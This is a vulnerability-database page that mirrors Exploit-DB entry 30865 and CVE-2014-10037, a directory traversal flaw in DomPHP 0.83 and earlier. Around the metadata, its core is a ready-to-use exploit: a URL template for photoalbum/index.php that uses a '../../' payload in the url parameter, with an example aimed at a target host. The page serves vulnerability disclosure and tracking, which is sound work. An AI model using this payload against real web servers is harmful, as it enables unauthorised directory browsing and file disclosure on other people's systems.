Search...

DomPHP <= 0.83 - Local Directory Traversal Vulnerability

2014-01-12T00:00:00

ID EDB-ID:30865
Type exploitdb
Reporter Houssamix
Modified 2014-01-12T00:00:00

Description

DomPHP <= 0.83 - Local Directory Traversal Vulnerability. CVE-2014-10037. Webapps exploit for php platform

                                        
                                            -------------------------------------------------------------
DomPHP &lt;= v0.83 Local Directory Traversal Vulnerability 
-------------------------------------------------------------
 
= Author : Houssamix                       
= Script : DomPHP &lt;= v0.83
                    
= Download : http://www.domphp.com/download/  
            
= BUG :  Local Directory Traversal Vulnerability 
 
= Exploit :                               
http://[target]/photoalbum/index.php?urlancien=&url=[Directory]
                 
Exemple : 				 
http://target.com/photoalbum/index.php?urlancien=&url=../../

JSON Vulners Source

Initial Source

{"id": "EDB-ID:30865", "hash": "04bbd5d137f159c4dddf485fa0b5a89f", "type": "exploitdb", "bulletinFamily": "exploit", "title": "DomPHP <= 0.83 - Local Directory Traversal Vulnerability", "description": "DomPHP <= 0.83 - Local Directory Traversal Vulnerability. CVE-2014-10037. Webapps exploit for php platform", "published": "2014-01-12T00:00:00", "modified": "2014-01-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/30865/", "reporter": "Houssamix", "references": [], "cvelist": ["CVE-2014-10037"], "lastseen": "2016-02-03T13:18:46", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/30865/", "sourceData": "-------------------------------------------------------------\r\nDomPHP <= v0.83 Local Directory Traversal Vulnerability \r\n-------------------------------------------------------------\r\n \r\n= Author : Houssamix \r\n= Script : DomPHP <= v0.83\r\n \r\n= Download : http://www.domphp.com/download/ \r\n \r\n= BUG : Local Directory Traversal Vulnerability \r\n \r\n= Exploit : \r\nhttp://[target]/photoalbum/index.php?urlancien=&url=[Directory]\r\n \r\nExemple : \t\t\t\t \r\nhttp://target.com/photoalbum/index.php?urlancien=&url=../../", "osvdbidlist": ["102204"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-09-08T10:26:45", "references": ["http://www.exploit-db.com/exploits/30865", "https://exchange.xforce.ibmcloud.com/vulnerabilities/90582"], "edition": 2, "description": "Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.", "reporter": "NVD", "published": "2015-01-13T10:59:47", "title": "CVE-2014-10037", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-10037"], "scanner": [], "cpe": ["cpe:/a:domphp:domphp:0.83"], "modified": "2017-09-07T21:29:03", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-10037", "id": "CVE-2014-10037", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}

DomPHP &lt;= 0.83 - Local Directory Traversal Vulnerability

Description

DomPHP <= 0.83 - Local Directory Traversal Vulnerability. CVE-2014-10037. Webapps exploit for php platform

DomPHP <= 0.83 - Local Directory Traversal Vulnerability